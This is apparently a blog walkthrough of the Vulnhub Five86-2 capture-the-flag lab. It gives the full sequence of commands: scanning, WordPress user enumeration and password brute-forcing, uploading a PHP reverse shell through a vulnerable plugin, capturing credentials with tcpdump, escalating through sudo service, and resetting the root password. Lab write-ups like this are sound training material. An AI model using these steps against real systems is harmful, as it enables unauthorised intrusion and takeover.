Vulnhub Five86-2 Walkthrough

We start by scanning the host with nmap –A –T4 –p- 192.168.1.5 –vv

Scanning with dirb:

We need to modify the hosts file to be able to access the WordPress service

Then we scan the host with wpscan –url http://192.168.1.5 –e u

Also we can brute force WordPress: wpscan –url http://five86-2/wp-login.php -P /root/pass/rockyou.txt -U barney

wpscan –url http://five86-2/wp-login.php -P /root/pass/rockyou.txt –U Stephen

Stephen has very low privilege to his account so we login in using barney’s account which he have an exploit on one of his plugins

Follow the steps as the file says and make 2 files one with shell code iinside it to connect back to our machine using nc

echo “<html>hello</html>” > index.html

zip poc.zip index.html php-reverse-shell.php

Open nc connection to your machine using the ip and port inside the shell then visit the link provided

five86-2//wp-content/uploads/articulate_uploads/poc4/php-reverse-shell.php

The users in home folder are permission denied when trying to access anyone of them

But we could use Stephen password apollo1 and switch user and from his id we can see he’s in a group pcap, I know pcap is an Ethernet file that we can view it with wireshark or tcpdump so I viewed it with tcpdump –D , then I googled how to put this to work and then the command is timeout 100 tcpdump -w mypcap.pcap -i veth2b14039 but we have to be at /tmp

Well I kept listening and listening for a while then finally we got a hit,, viewing the file

Now we have user paul and password esomepasswford , let’s login

Then I had no idea what to do  so I googled it and found this link https://gtfobins.github.io/gtfobins/service/

Exactly what I needed sudo -u peter /usr/sbin/service ../../bin/sh

Now im peter

ok now you have just to type sudo /usr/bin/passwd and give a new password and then su root and you are root and catch that flag.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s